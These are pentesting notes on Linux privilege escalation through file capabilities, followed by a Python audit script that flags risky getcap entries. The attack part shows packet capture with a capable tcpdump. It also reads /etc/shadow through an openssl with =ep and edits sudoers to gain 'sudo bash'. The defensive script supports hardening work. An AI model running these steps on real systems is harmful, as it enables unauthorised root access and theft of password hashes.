if you see ep (effective + permitted) in the capabilities, this is usually the priv esc path!!

Example. POSIX capabilities set:

/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
  • it lets tcpdump capture packets with root-level network privileges.

Example Exploitation:

ssh user@IP "tcpdump -i interface -U -s0 -w - 'not port 22'" | wireshark -k -i -
  • the trailing hyphen in -w - means write the capture to standard output (and wireshark -i - reads it from standard input)

  • you may need to use the full path like "/usr/sbin/tcpdump" (run which tcpdump to see the path)

  • try different interfaces if available, e.g. -i lo

  • try doing something that makes the server generate traffic (like visiting different web pages if it's running HTTP), or ping localhost within the ssh session

ep only

if the capabilities show command=ep (no capability names before the =) then we have every capability on that particular command

e.g. openssl=ep

this means we can execute the command with all kinds of permissions, except that it does not give us sudo.

Go to GTFOBins and see what that binary can do. Reading root-only files such as /etc/shadow is possible.

./openssl enc -in /etc/shadow    (use ./openssl if the capable copy is in the current directory, check with which openssl; otherwise run it normally)
./openssl enc -in /etc/sudoers > sudoers
edit the sudoers file and add a permission for the current user (ALL=(ALL) ALL)
  • ./ runs the copy in the home directory, which is the one that carries the capabilities.

Now you can do sudo bash!
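Added here as the defender's counterpart to these notes (not part of the original page): a small Python audit that parses getcap -r / output, accepting both the older "path = caps" and the newer "path caps" print styles, and flags a bare =ep (every capability) as CRITICAL and the dangerous +ep capabilities discussed above as HIGH. The HIGH_RISK list and the sample lines are constructed assumptions for this example.

```python
import re
# Capabilities that commonly give a direct path to root when effective on a
# binary. Assumed list for this example, not an exhaustive reference.
HIGH_RISK = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search", "cap_chown",
             "cap_fowner", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_net_raw", "cap_net_admin"}
CLAUSE_RE = re.compile(r"^([a-z0-9_,]*)([=+-])([eip]*)$")  # names, operator, flags

def parse_getcap_line(line):
    """Return (path, caps, flags) or None; caps is ("ALL",) for a bare '=ep'."""
    parts = line.split()
    if len(parts) >= 3 and parts[1] == "=":   # older libcap prints "path = spec"
        del parts[1]
    if len(parts) < 2:
        return None
    caps, flags = set(), set()
    for clause in parts[1:]:
        m = CLAUSE_RE.match(clause)
        if not m:
            return None
        names, op, fl = m.groups()
        if op == "-":                          # flags being removed, not granted
            continue
        caps.update(names.split(",") if names else ["ALL"])
        flags.update(fl)
    return parts[0], tuple(sorted(caps)), "".join(c for c in "eip" if c in flags)

def assess(line):
    # Map one getcap line to (path, caps, flags, severity); None if not getcap output.
    parsed = parse_getcap_line(line)
    if parsed is None:
        return None
    path, caps, flags = parsed
    usable = "e" in flags and "p" in flags     # the "ep" these notes warn about
    risky = "ALL" in caps or bool(HIGH_RISK.intersection(caps))
    if "ALL" in caps and usable:
        severity = "CRITICAL"                  # every capability, effective at exec
    elif risky:
        severity = "HIGH" if usable else "REVIEW"  # REVIEW: permitted only, must self-raise
    else:
        severity = "INFO"
    return path, caps, flags, severity

# Constructed sample of getcap -r / output in both formats (not from a real host).
SAMPLE = """\
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
/usr/bin/openssl =ep
/usr/bin/gst-ptp-helper cap_net_bind_service,cap_sys_nice=ep
/usr/lib/utempter/utempter cap_setgid+p
"""
FINDINGS = [f for f in map(assess, SAMPLE.splitlines()) if f is not None]
```

Pipe real output into it with getcap -r / 2>/dev/null and review anything rated CRITICAL or HIGH; a REVIEW entry only matters if the program raises the capability into its effective set itself.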
